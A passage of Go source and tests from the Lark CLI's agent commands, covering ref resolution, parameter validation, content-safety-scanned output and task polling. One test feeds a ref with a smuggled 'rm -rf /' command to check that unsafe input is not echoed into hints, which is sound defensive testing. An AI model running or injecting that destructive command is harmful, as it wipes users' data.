// wrapped into a validation typed error (subtype invalid_argument, exit 2), so
// those surface before (not behind) the config gate.
func resolveProviderNoClient(f *cmdutil.Factory, cmd *cobra.Command, ref, asStr string) (*iagent.Provider, core.Identity, error) {
id := f.ResolveAs(cmd.Context(), cmd, core.Identity(asStr))
if err := f.CheckIdentity(id, supportedIdentities); err != nil {
return nil, "", err
}
p, err := iagent.Resolve(ref, iagent.Deps{As: id})
if err != nil {
// ParseRef / unknown-scheme errors already carry the validation wording;
// promote them to a typed validation error (with a recovery hint)
// so RunE never returns a bare error and the exit code / subtype are
// stable.
return nil, "", wrapRefResolveError(err)
}
return p, id, nil
}
// wrapRefResolveError promotes a ParseRef / provider-resolution error to a
// validation typed error (subtype invalid_argument, exit 2) and attaches the
// recovery hint keyed to the failure mode: a malformed ref (no ':' / empty
// half — matched via the ErrInvalidRef sentinel) teaches the <scheme>:<agent_id>
// shape; an unknown scheme points at `agent list` to discover the available
// providers. Both hints are copy-pasteable next steps, not just wording.
func wrapRefResolveError(err error) error {
e := errs.NewValidationError(errs.SubtypeInvalidArgument, "%s", err.Error()).WithCause(err)
if errors.Is(err, iagent.ErrInvalidRef) {
return e.WithHint("agent_ref 形如 <scheme>:<agent_id>,如 example:echo")
}
return e.WithHint("用 lark-cli agent list 查看可用 provider")
}
// resolveProvider resolves the identity and constructs the Provider addressed
// by ref backed by a configured API client, for commands that actually call the
// remote API. Ref/scheme validation runs first (via resolveProviderNoClient) so
// a malformed ref or unknown scheme is a validation error (exit 2) surfaced
// BEFORE the config gate — an unconfigured user still gets the precise error,
// not not_configured. Only after the ref is valid does it require a
// configured client (not_configured / exit 3 is correct for a real API call).
//
// Wiring rule: every verb that calls the real API MUST run preflightScopesForRef
// right after this succeeds and before the API call, so a new verb is
// never silently exempt from the local scope preflight.
func resolveProvider(f *cmdutil.Factory, cmd *cobra.Command, ref, asStr string) (*iagent.Provider, core.Identity, error) {
_, id, err := resolveProviderNoClient(f, cmd, ref, asStr)
if err != nil {
return nil, "", err
}
apiClient, err := f.NewAPIClient()
if err != nil {
return nil, "", err
}
p, err := iagent.Resolve(ref, iagent.Deps{Client: apiClient, As: id})
if err != nil {
return nil, "", wrapRefResolveError(err)
}
return p, id, nil
}
// cardHint builds the "check the agent card" hint. The ref is user-echoed
// input: when it passes the safeNextRef whitelist the hint carries the
// copy-pasteable command; otherwise it degrades to plain guidance without any
// interpolated command (a ref containing spaces would make the command
// non-copy-pasteable, and the hint is what an AI copies verbatim).
func cardHint(ref, what string) string {
if safeNextRef(ref) {
return fmt.Sprintf("运行 lark-cli agent card %s 查看%s", ref, what)
}
return fmt.Sprintf("查看该 agent 的能力卡片agent card 命令)确认%s", what)
}
// parseAndValidateParams parses `key=value` --param pairs and validates them
// against the card's Parameters declaration: every Required parameter must be
// present, and every provided key must be declared (an undeclared key
// would otherwise be silently dropped by the provider). A pair without '=' (or
// an empty key), a missing required parameter, or an unknown key returns a
// validation typed error (subtype invalid_argument, param "param:<key>")
// whose hint points at `agent card <ref>`. A nil card skips both
// card-driven checks.
func parseAndValidateParams(kvs []string, card *iagent.AgentCard, ref string) (map[string]string, error) {
m := make(map[string]string, len(kvs))
for _, kv := range kvs {
k, v, ok := strings.Cut(kv, "=")
if !ok || k == "" {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument,
"--param 格式应为 key=value得到 %q", kv).
WithParam("--param").
WithHint("以 --param key=value 形式重发")
}
m[k] = v
}
if card != nil {
declared := make(map[string]bool, len(card.Parameters))
for _, p := range card.Parameters {
declared[p.Name] = true
}
// Unknown keys are checked in input order so the reported key is
// deterministic when several are undeclared.
for _, kv := range kvs {
k, _, _ := strings.Cut(kv, "=")
if !declared[k] {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知参数 %s该 agent 未声明此参数)", k).
WithParam("param:"+k).
WithHint("%s", cardHint(ref, " parameters 声明"))
}
}
for _, p := range card.Parameters {
if !p.Required {
continue
}
if _, ok := m[p.Name]; !ok {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument,
"缺少必填参数 %s该 agent 要求)", p.Name).
WithParam("param:"+p.Name).
WithHint("%s", cardHint(ref, " parameters 声明"))
}
}
}
return m, nil
}
// emitTask writes a task result: the standard success envelope carrying
// meta.next[] hints for AI callers, or — with format=pretty and no --jq —
// the key:value human view. Because the agent's messages/artifacts are
// untrusted external content, the payload is run through content-safety
// scanning before emission on BOTH paths (and the pretty path additionally
// ANSI-strips agent text). A --jq expression, when the leaf command registers
// one, implies structured JSON and filters stdout.
func emitTask(f *cmdutil.Factory, cmd *cobra.Command, task *iagent.AgentTask, next []output.NextAction, format string) error {
out := f.IOStreams.Out
errOut := f.IOStreams.ErrOut
scan := output.ScanForSafety(cmd.CommandPath(), task, errOut)
if scan.Blocked {
return scan.BlockErr
}
if format == "pretty" && jqExpr(cmd) == "" {
if scan.Alert != nil {
output.WriteAlertWarning(errOut, scan.Alert)
}
printTaskPretty(out, task)
return nil
}
env := output.Envelope{
OK: true,
Identity: string(f.ResolvedIdentity),
Data: task,
Notice: output.GetNotice(),
}
if len(next) > 0 {
env.Meta = &output.Meta{Next: next}
}
if scan.Alert != nil {
env.ContentSafetyAlert = scan.Alert
}
if jq := jqExpr(cmd); jq != "" {
if scan.Alert != nil {
output.WriteAlertWarning(errOut, scan.Alert)
}
return output.JqFilter(out, env, jq)
}
output.PrintJson(out, env)
return nil
}
// jqExpr reads the --jq flag value if the leaf command registered one; absent
// otherwise.
func jqExpr(cmd *cobra.Command) string {
if cmd == nil { // options structs built directly in tests may carry no Cmd
return ""
}
if f := cmd.Flags().Lookup("jq"); f != nil {
return f.Value.String()
}
return ""
}
// capabilityError returns the unsupported_capability validation error (exit 2)
// used for capability gating: capHuman is the human-facing action (e.g.
// "task cancel"), capKey the Card capability key (e.g. task_cancel). The hint
// interpolates ref only when it passes the whitelist (cardHint).
func capabilityError(ref, capHuman, capKey string) error {
return errs.NewValidationError(
errs.SubtypeUnsupportedCapability,
"agent '%s' 不支持 '%s'capability %s=false", ref, capHuman, capKey,
).WithHint("%s", cardHint(ref, "支持的能力"))
}
// normalizeTask derives the redundant IsTerminal flag from State — the single
// source of truth — the moment a task enters the command layer, so a provider
// that forgets (or mis-fills) the flag can never skew watch exit codes or an
// AI caller's stop-polling decision. nil-safe; returns t for call-site chaining.
func normalizeTask(t *iagent.AgentTask) *iagent.AgentTask {
if t != nil {
t.IsTerminal = t.State.IsTerminal()
}
return t
}
// normalizeTaskSummaries derives IsTerminal from State for every summary (same
// single-source rule as normalizeTask), returning the slice for chaining.
func normalizeTaskSummaries(ts []iagent.TaskSummary) []iagent.TaskSummary {
for i := range ts {
ts[i].IsTerminal = ts[i].State.IsTerminal()
}
return ts
}
// pollToStop polls GetTask with exponential backoff (1s → 5s cap) until the
// task hits a stop condition (terminal, input_required, or auth_required)
// or ctx is done. A timeout is not a failure: it returns the most recent
// task with a nil error, letting the caller print the current state (exit 0). A
// provider GetTask error is surfaced.
func pollToStop(ctx context.Context, p *iagent.Provider, taskID string) (*iagent.AgentTask, error) {
const (
initialDelay = time.Second
maxDelay = 5 * time.Second
)
var last *iagent.AgentTask
delay := initialDelay
for {
task, err := p.GetTask(ctx, taskID)
if err != nil {
return last, err
}
last = task
if task.State.ShouldStopPolling() {
return task, nil
}
if ctx.Err() != nil {
return last, nil //nolint:nilerr // a poll timeout is an observation-window close, not a task failure — return the last task with exit 0
}
if !sleep(ctx, delay) {
// ctx canceled during backoff → observation window closed, not a
// task failure.
return last, nil
}
if delay < maxDelay {
if delay *= 2; delay > maxDelay {
delay = maxDelay
}
}
}
}
// semanticExitError maps a wait/watch terminal task to the semantic exit code:
// a non-successful terminal state (failed/rejected/canceled) yields a
// silent exit-1 signal; any other state (including a successful terminal or a
// non-terminal stop like input_required) yields nil. A nil task yields nil.
func semanticExitError(task *iagent.AgentTask) error {
if task == nil || !task.IsTerminal {
return nil
}
switch task.State {
case iagent.StateFailed, iagent.StateRejected, iagent.StateCanceled:
return output.ErrBare(1)
default:
return nil
}
}

798
cmd/agent/common_test.go Normal file
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@@ -0,0 +1,798 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"bytes"
"context"
"encoding/json"
"errors"
"strings"
"testing"
"time"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
extcs "github.com/larksuite/cli/extension/contentsafety"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/output"
)
func TestValidateParamsAgainstCard(t *testing.T) {
// Card mixes a required and an optional param so both loop branches run:
// the optional param must be skipped (the `!p.Required continue` path) while
// the required one is still enforced.
card := &iagent.AgentCard{Parameters: []iagent.CardParam{
{Name: "app_id", Required: true},
{Name: "locale", Required: false},
}}
// missing required
if _, err := parseAndValidateParams([]string{}, card, "example:agt_x"); err == nil {
t.Error("missing required app_id should error")
}
// provide required, omit optional: the optional param is skipped and must not error
m, err := parseAndValidateParams([]string{"app_id=app_sales"}, card, "example:agt_x")
if err != nil || m["app_id"] != "app_sales" {
t.Fatalf("should parse app_id and allow omitting optional locale: %v %v", m, err)
}
if _, ok := m["locale"]; ok {
t.Errorf("an optional param that was not provided should not appear in the result: %v", m)
}
// invalid format
if _, err := parseAndValidateParams([]string{"noequals"}, card, "example:agt_x"); err == nil {
t.Error("--param without = should error")
}
}
// TestParseParams_ValueWithEquals ensures values may themselves contain '='
// (only the first '=' splits key from value).
func TestParseParams_ValueWithEquals(t *testing.T) {
card := &iagent.AgentCard{Parameters: []iagent.CardParam{{Name: "filter"}}}
m, err := parseAndValidateParams([]string{"filter=a=b"}, card, "example:agt_x")
if err != nil {
t.Fatalf("a value containing = should not error: %v", err)
}
if m["filter"] != "a=b" {
t.Fatalf("value should preserve =, got %q", m["filter"])
}
}
// TestParseParams_EmptyKey rejects an empty key (leading '=').
func TestParseParams_EmptyKey(t *testing.T) {
if _, err := parseAndValidateParams([]string{"=v"}, &iagent.AgentCard{}, "example:agt_x"); err == nil {
t.Error("empty key should error")
}
}
// TestParseParams_UnknownKeyRejected pins that a --param key not declared in the
// card's Parameters is a validation error (subtype invalid_argument, param
// "param:<key>") whose hint points at `agent card`; a declared optional key
// still passes.
func TestParseParams_UnknownKeyRejected(t *testing.T) {
card := &iagent.AgentCard{Parameters: []iagent.CardParam{{Name: "foo"}}}
m, err := parseAndValidateParams([]string{"foo=1"}, card, "example:agt_x")
if err != nil || m["foo"] != "1" {
t.Fatalf("a declared optional param should pass: %v %v", m, err)
}
_, err = parseAndValidateParams([]string{"bar=1"}, card, "example:agt_x")
if err == nil {
t.Fatal("an undeclared --param should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
var verr *errs.ValidationError
if !errors.As(err, &verr) || verr.Param != "param:bar" {
t.Fatalf("param should be param:bar, got %+v", verr)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
if !strings.Contains(p.Hint, "agent card example:agt_x") {
t.Fatalf("hint should point to agent card, got %q", p.Hint)
}
}
// TestParseParams_NilCard tolerates a nil card (no required/unknown-param check).
func TestParseParams_NilCard(t *testing.T) {
m, err := parseAndValidateParams([]string{"k=v"}, nil, "example:agt_x")
if err != nil || m["k"] != "v" {
t.Fatalf("nil card should parse normally: %v %v", m, err)
}
}
// TestParseParams_MissingRequiredIsValidation confirms the missing-required
// error is a validation typed error with subtype invalid_argument, its param
// carries the param: prefix, and its hint points at agent card (Task 2 review
// leftover).
func TestParseParams_MissingRequiredIsValidation(t *testing.T) {
card := &iagent.AgentCard{Parameters: []iagent.CardParam{{Name: "app_id", Required: true}}}
_, err := parseAndValidateParams([]string{}, card, "example:agt_x")
if err == nil {
t.Fatal("missing required should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
p, _ := errs.ProblemOf(err)
if p == nil || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
var verr *errs.ValidationError
if !errors.As(err, &verr) || verr.Param != "param:app_id" {
t.Fatalf("param should be param:app_id, got %+v", verr)
}
if !strings.Contains(p.Hint, "agent card example:agt_x") {
t.Fatalf("hint should point to agent card, got %q", p.Hint)
}
}
// TestParseParams_UnsafeRefDegradesHint pins the ref-interpolation whitelist on
// the hint side: a ref that fails the <charset>:<charset> whitelist must not be
// echoed into the hint command; the hint degrades to plain guidance instead.
func TestParseParams_UnsafeRefDegradesHint(t *testing.T) {
dirtyRef := "example:agt x; rm -rf /"
card := &iagent.AgentCard{Parameters: []iagent.CardParam{{Name: "app_id", Required: true}}}
_, err := parseAndValidateParams([]string{}, card, dirtyRef)
if err == nil {
t.Fatal("missing required should error")
}
p, _ := errs.ProblemOf(err)
if p == nil || p.Hint == "" {
t.Fatalf("hint should degrade to plain-text guidance rather than be emptied, got %+v", p)
}
if strings.Contains(p.Hint, dirtyRef) {
t.Fatalf("an unsafe ref must not be interpolated into the hint, got %q", p.Hint)
}
// the unknown-param path is handled the same way.
_, err = parseAndValidateParams([]string{"app_id=1", "bogus=1"}, card, dirtyRef)
if err == nil {
t.Fatal("an undeclared param should error")
}
p, _ = errs.ProblemOf(err)
if p == nil || p.Hint == "" || strings.Contains(p.Hint, dirtyRef) {
t.Fatalf("unknown-param hint should degrade and not contain the unsafe ref, got %+v", p)
}
}
// TestCapabilityError_UnsafeRefDegradesHint pins the same whitelist on the
// capability-gate hint: an unsafe ref degrades the hint to plain guidance.
func TestCapabilityError_UnsafeRefDegradesHint(t *testing.T) {
err := capabilityError("example:agt x", "task cancel", iagent.CapTaskCancel)
p, ok := errs.ProblemOf(err)
if !ok || p.Hint == "" {
t.Fatalf("hint should degrade to plain-text guidance rather than be emptied, got %+v", p)
}
if strings.Contains(p.Hint, "example:agt x") {
t.Fatalf("an unsafe ref must not be interpolated into the hint, got %q", p.Hint)
}
}
// TestCapabilityError pins the unsupported_capability contract.
func TestCapabilityError(t *testing.T) {
err := capabilityError("example:agt_xxx", "task cancel", iagent.CapTaskCancel)
if err == nil {
t.Fatal("should return an error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.Subtype("unsupported_capability") {
t.Fatalf("subtype should be unsupported_capability, got %+v", p)
}
if output.ExitCodeOf(err) != output.ExitValidation {
t.Fatalf("exit should be %d, got %d", output.ExitValidation, output.ExitCodeOf(err))
}
}
// TestSemanticExitError maps terminal task states to the wait/watch exit code.
func TestSemanticExitError(t *testing.T) {
cases := []struct {
state iagent.TaskState
wantExit int
}{
{iagent.StateCompleted, output.ExitOK},
{iagent.StateFailed, 1},
{iagent.StateRejected, 1},
{iagent.StateCanceled, 1},
{iagent.StateInputRequired, output.ExitOK}, // non-terminal, not treated as failure
{iagent.StateWorking, output.ExitOK},
}
for _, c := range cases {
task := &iagent.AgentTask{State: c.state, IsTerminal: c.state.IsTerminal()}
err := semanticExitError(task)
if got := output.ExitCodeOf(err); got != c.wantExit {
t.Errorf("state=%s exit expected %d got %d (err=%v)", c.state, c.wantExit, got, err)
}
}
// nil task should not panic and is treated as success
if err := semanticExitError(nil); err != nil {
t.Errorf("nil task should return nil, got %v", err)
}
}
// fakePollProvider drives pollToStop through a scripted state sequence. It is
// not registered, so provider() only wires GetTask (the sole field pollToStop
// touches); calls/err stay observable on the struct after the poll.
type fakePollProvider struct {
states []iagent.TaskState
calls int
err error
}
func (f *fakePollProvider) provider() *iagent.Provider {
return &iagent.Provider{
GetTask: func(ctx context.Context, taskID string) (*iagent.AgentTask, error) {
if f.err != nil {
return nil, f.err
}
i := f.calls
if i >= len(f.states) {
i = len(f.states) - 1
}
f.calls++
s := f.states[i]
return &iagent.AgentTask{TaskID: taskID, State: s, IsTerminal: s.IsTerminal()}, nil
},
}
}
// TestPollToStop_ReachesTerminal stops once a terminal state is observed.
func TestPollToStop_ReachesTerminal(t *testing.T) {
restore := swapSleep()
defer restore()
p := &fakePollProvider{states: []iagent.TaskState{iagent.StateWorking, iagent.StateWorking, iagent.StateCompleted}}
task, err := pollToStop(context.Background(), p.provider(), "chat_1")
if err != nil {
t.Fatalf("should not error: %v", err)
}
if task == nil || task.State != iagent.StateCompleted {
t.Fatalf("should stop at completed, got %+v", task)
}
if p.calls < 3 {
t.Fatalf("should poll at least 3 times, got %d", p.calls)
}
}
// TestPollToStop_StopsOnInputRequired treats input_required as a stop point.
func TestPollToStop_StopsOnInputRequired(t *testing.T) {
restore := swapSleep()
defer restore()
p := &fakePollProvider{states: []iagent.TaskState{iagent.StateWorking, iagent.StateInputRequired}}
task, err := pollToStop(context.Background(), p.provider(), "chat_1")
if err != nil {
t.Fatalf("should not error: %v", err)
}
if task.State != iagent.StateInputRequired {
t.Fatalf("should stop at input_required, got %s", task.State)
}
}
// TestPollToStop_ContextTimeoutNotFailure confirms that timeout returns the
// current task with a nil error (exit 0), not a failure.
func TestPollToStop_ContextTimeoutNotFailure(t *testing.T) {
restore := swapSleep()
defer restore()
ctx, cancel := context.WithCancel(context.Background())
cancel() // expire immediately
p := &fakePollProvider{states: []iagent.TaskState{iagent.StateWorking}}
task, err := pollToStop(ctx, p.provider(), "chat_1")
if err != nil {
t.Fatalf("timeout should not be treated as failure: %v", err)
}
if task == nil || task.State != iagent.StateWorking {
t.Fatalf("timeout should return the current task, got %+v", task)
}
}
// TestPollToStop_GetTaskError surfaces a provider error.
func TestPollToStop_GetTaskError(t *testing.T) {
restore := swapSleep()
defer restore()
p := &fakePollProvider{states: []iagent.TaskState{iagent.StateWorking}, err: errors.New("boom")}
if _, err := pollToStop(context.Background(), p.provider(), "chat_1"); err == nil {
t.Fatal("a GetTask error should propagate")
}
}
// swapSleep replaces the package sleep with a no-op for fast tests.
func swapSleep() func() {
orig := sleep
sleep = func(context.Context, time.Duration) bool { return true }
return func() { sleep = orig }
}
// swapSleepCapture replaces the package sleep with a no-op that records every
// backoff duration it was asked to wait, so tests can assert the exponential /
// clamp schedule. It always returns true (full duration elapsed).
func swapSleepCapture(delays *[]time.Duration) func() {
orig := sleep
sleep = func(_ context.Context, d time.Duration) bool {
*delays = append(*delays, d)
return true
}
return func() { sleep = orig }
}
// swapSleepFalseAt replaces the package sleep with a no-op that returns false
// (as if ctx were canceled during backoff) on the falseCall-th invocation
// (1-indexed) and true otherwise. Lets tests exercise the sleep-returns-false
// branch in isolation without racing a real ctx timeout.
func swapSleepFalseAt(falseCall int) func() {
orig := sleep
n := 0
sleep = func(context.Context, time.Duration) bool {
n++
return n != falseCall
}
return func() { sleep = orig }
}
// TestPollToStop_ClampsDelayToMax drives >=4 backoff rounds so the exponential
// delay overshoots the 5s cap and the clamp branch (line 179) executes. The
// captured schedule must never exceed maxDelay and must actually reach it.
func TestPollToStop_ClampsDelayToMax(t *testing.T) {
var delays []time.Duration
restore := swapSleepCapture(&delays)
defer restore()
// 5 Working states then Completed: forces backoff 1s,2s,4s,5s(clamped),5s...
p := &fakePollProvider{states: []iagent.TaskState{
iagent.StateWorking, iagent.StateWorking, iagent.StateWorking,
iagent.StateWorking, iagent.StateWorking, iagent.StateCompleted,
}}
task, err := pollToStop(context.Background(), p.provider(), "chat_1")
if err != nil {
t.Fatalf("should not error: %v", err)
}
if task == nil || task.State != iagent.StateCompleted {
t.Fatalf("should stop at completed, got %+v", task)
}
want := []time.Duration{1 * time.Second, 2 * time.Second, 4 * time.Second, 5 * time.Second, 5 * time.Second}
if len(delays) != len(want) {
t.Fatalf("backoff count should be %d, got %d (%v)", len(want), len(delays), delays)
}
for i, d := range delays {
if d > 5*time.Second {
t.Errorf("backoff #%d=%v exceeds the 5s cap", i, d)
}
if d != want[i] {
t.Errorf("backoff #%d expected %v got %v", i, want[i], d)
}
}
}
// TestPollToStop_SleepCanceledDuringBackoff isolates the sleep-returns-false
// branch (lines 173-177): ctx.Err() is still nil when the loop reaches the
// sleep, but sleep reports the wait was cut short, so pollToStop returns the
// most recent task with a nil error (not a failure).
func TestPollToStop_SleepCanceledDuringBackoff(t *testing.T) {
restore := swapSleepFalseAt(1) // first backoff sleep is interrupted
defer restore()
p := &fakePollProvider{states: []iagent.TaskState{iagent.StateWorking, iagent.StateCompleted}}
task, err := pollToStop(context.Background(), p.provider(), "chat_1")
if err != nil {
t.Fatalf("an interrupted sleep should not be treated as failure: %v", err)
}
if task == nil || task.State != iagent.StateWorking {
t.Fatalf("should return the working task observed before interruption, got %+v", task)
}
if p.calls != 1 {
t.Fatalf("should not poll again after sleep interruption, expected 1 GetTask call got %d", p.calls)
}
}
// TestJqExpr covers both jqExpr branches: a command with a registered --jq flag
// returns its value; a command without the flag returns "".
func TestJqExpr(t *testing.T) {
withFlag := &cobra.Command{Use: "get"}
withFlag.Flags().String("jq", "", "")
if err := withFlag.Flags().Set("jq", ".state"); err != nil {
t.Fatal(err)
}
if got := jqExpr(withFlag); got != ".state" {
t.Errorf("with a --jq flag it should return its value, got %q", got)
}
noFlag := &cobra.Command{Use: "list"}
if got := jqExpr(noFlag); got != "" {
t.Errorf("without a --jq flag it should return empty, got %q", got)
}
}
// newEmitCmd builds a `lark-cli agent <name>` command whose CommandPath() is
// non-empty (required for content-safety scanning to engage) and optionally
// registers a --jq flag with the given value.
func newEmitCmd(name, jq string) *cobra.Command {
root := &cobra.Command{Use: "lark-cli"}
agentGroup := &cobra.Command{Use: "agent"}
leaf := &cobra.Command{Use: name}
root.AddCommand(agentGroup)
agentGroup.AddCommand(leaf)
if jq != "" {
leaf.Flags().String("jq", "", "")
_ = leaf.Flags().Set("jq", jq)
}
leaf.SetContext(context.Background())
return leaf
}
// emitFactory returns a Factory writing to fresh out/err buffers.
func emitFactory() (*cmdutil.Factory, *bytes.Buffer, *bytes.Buffer) {
out := &bytes.Buffer{}
errOut := &bytes.Buffer{}
f := &cmdutil.Factory{
IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: errOut},
ResolvedIdentity: core.AsBot,
}
return f, out, errOut
}
// csProvider is a content-safety provider stub returning a fixed alert.
type csProvider struct{ alert *extcs.Alert }
func (p *csProvider) Name() string { return "test" }
func (p *csProvider) Scan(context.Context, extcs.ScanRequest) (*extcs.Alert, error) {
return p.alert, nil
}
// TestEmitTask_PlainSuccess emits a task with no jq, no alert: the full envelope
// lands on stdout with ok=true and the identity.
func TestEmitTask_PlainSuccess(t *testing.T) {
f, out, _ := emitFactory()
cmd := newEmitCmd("task", "")
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateCompleted, IsTerminal: true}
next := []output.NextAction{{Label: "poll", Command: "lark-cli agent task get example:x chat_1"}}
if err := emitTask(f, cmd, task, next, "json"); err != nil {
t.Fatalf("emit should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("envelope should be valid JSON: %v (%s)", err, out.String())
}
if !env.OK || env.Identity != string(core.AsBot) {
t.Errorf("ok/identity mismatch: %+v", env)
}
if !strings.Contains(out.String(), `"next"`) || !strings.Contains(out.String(), "poll") {
t.Errorf("meta.next should appear in the output: %s", out.String())
}
}
// TestEmitTask_NoNextOmitsMeta pins the omitempty branch (common.go line 113):
// when next is nil or an empty (non-nil) slice, emitTask must leave env.Meta nil
// so "meta" is absent from the serialized envelope. Covers both len(next)==0
// inputs the branch can receive.
func TestEmitTask_NoNextOmitsMeta(t *testing.T) {
for _, tc := range []struct {
name string
next []output.NextAction
}{
{"nil next", nil},
{"empty non-nil next", []output.NextAction{}},
} {
t.Run(tc.name, func(t *testing.T) {
f, out, _ := emitFactory()
cmd := newEmitCmd("task", "")
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateCompleted, IsTerminal: true}
if err := emitTask(f, cmd, task, tc.next, "json"); err != nil {
t.Fatalf("emit should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("envelope should be valid JSON: %v (%s)", err, out.String())
}
if env.Meta != nil {
t.Errorf("Meta should be nil when len(next)==0, got %+v", env.Meta)
}
if strings.Contains(out.String(), `"meta"`) {
t.Errorf("meta should be omitted by omitempty when next is empty: %s", out.String())
}
})
}
}
// TestEmitTask_JqFilter routes stdout through a valid jq expression.
func TestEmitTask_JqFilter(t *testing.T) {
f, out, _ := emitFactory()
cmd := newEmitCmd("task", ".data.state")
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateWorking}
if err := emitTask(f, cmd, task, nil, "json"); err != nil {
t.Fatalf("jq filtering should not error: %v", err)
}
if got := strings.TrimSpace(out.String()); got != "working" {
t.Errorf("jq .data.state should output working, got %q", got)
}
}
// TestEmitTask_JqFilterError surfaces a malformed jq expression as an error.
func TestEmitTask_JqFilterError(t *testing.T) {
f, _, _ := emitFactory()
cmd := newEmitCmd("task", "{") // unbalanced → gojq.Parse fails
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateWorking}
if err := emitTask(f, cmd, task, nil, "json"); err == nil {
t.Fatal("a malformed jq expression should error")
}
}
// TestEmitTask_ContentSafetyAlertWarn attaches a warn-mode alert to the envelope
// without blocking output.
func TestEmitTask_ContentSafetyAlertWarn(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONTENT_SAFETY_MODE", "warn")
extcs.Register(&csProvider{alert: &extcs.Alert{Provider: "test", MatchedRules: []string{"r1"}}})
defer extcs.Register(nil)
f, out, _ := emitFactory()
cmd := newEmitCmd("task", "")
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateCompleted, IsTerminal: true}
if err := emitTask(f, cmd, task, nil, "json"); err != nil {
t.Fatalf("warn mode should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("unmarshal: %v (%s)", err, out.String())
}
if env.ContentSafetyAlert == nil {
t.Error("warn mode should attach the alert to the envelope")
}
}
// TestEmitTask_ContentSafetyAlertWarnWithJq exercises the WriteAlertWarning +
// JqFilter branch: an alert plus a --jq expression writes a stderr warning and
// still filters stdout.
func TestEmitTask_ContentSafetyAlertWarnWithJq(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONTENT_SAFETY_MODE", "warn")
extcs.Register(&csProvider{alert: &extcs.Alert{Provider: "test", MatchedRules: []string{"r1"}}})
defer extcs.Register(nil)
f, out, errOut := emitFactory()
cmd := newEmitCmd("task", ".data.state")
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateWorking}
if err := emitTask(f, cmd, task, nil, "json"); err != nil {
t.Fatalf("warn+jq should not error: %v", err)
}
if got := strings.TrimSpace(out.String()); got != "working" {
t.Errorf("jq output should be working, got %q", got)
}
if !strings.Contains(errOut.String(), "content safety alert") {
t.Errorf("stderr should contain a content-safety warning, got %q", errOut.String())
}
}
// TestEmitTask_ContentSafetyBlocked returns the block error and writes nothing
// to stdout.
func TestEmitTask_ContentSafetyBlocked(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONTENT_SAFETY_MODE", "block")
extcs.Register(&csProvider{alert: &extcs.Alert{Provider: "test", MatchedRules: []string{"r1"}}})
defer extcs.Register(nil)
f, out, _ := emitFactory()
cmd := newEmitCmd("task", "")
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateCompleted, IsTerminal: true}
err := emitTask(f, cmd, task, nil, "json")
if err == nil {
t.Fatal("block mode should return BlockErr")
}
if !errs.IsContentSafety(err) {
t.Errorf("should be a content-safety error, got %T", err)
}
if out.Len() > 0 {
t.Errorf("block mode should not write to stdout, got %q", out.String())
}
}
// resolveCmd builds an `agent card` command carrying an `--as` flag. When
// asChanged is true the flag is marked as explicitly set, so ResolveAs honors
// the passed identity verbatim (needed to exercise the identity-check branch).
func resolveCmd(t *testing.T, asChanged bool, asVal string) *cobra.Command {
t.Helper()
root := &cobra.Command{Use: "lark-cli"}
group := &cobra.Command{Use: "agent"}
leaf := &cobra.Command{Use: "card"}
root.AddCommand(group)
group.AddCommand(leaf)
leaf.Flags().String("as", "", "identity")
if asChanged {
if err := leaf.Flags().Set("as", asVal); err != nil {
t.Fatal(err)
}
}
leaf.SetContext(context.Background())
return leaf
}
// TestResolveProvider_Success resolves a valid example ref under an explicit bot
// identity and returns a non-nil provider.
func TestResolveProvider_Success(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
cmd := resolveCmd(t, true, "bot")
p, id, err := resolveProvider(f, cmd, "example:agt_x", "bot")
if err != nil {
t.Fatalf("a valid ref + bot should succeed: %v", err)
}
if p == nil {
t.Fatal("should return a non-nil provider")
}
if id != core.AsBot {
t.Errorf("identity should be bot, got %s", id)
}
}
// TestResolveProvider_MalformedRef wraps a ParseRef failure into an
// invalid_argument validation error (exit 2).
func TestResolveProvider_MalformedRef(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
cmd := resolveCmd(t, true, "bot")
_, _, err := resolveProvider(f, cmd, "no-colon", "bot")
if err == nil {
t.Fatal("malformed ref should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
p, _ := errs.ProblemOf(err)
if p == nil || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
// Hand-written validation errors carry a recovery hint. A malformed ref
// teaches the <scheme>:<agent_id> shape.
if !strings.Contains(p.Hint, "<scheme>:<agent_id>") {
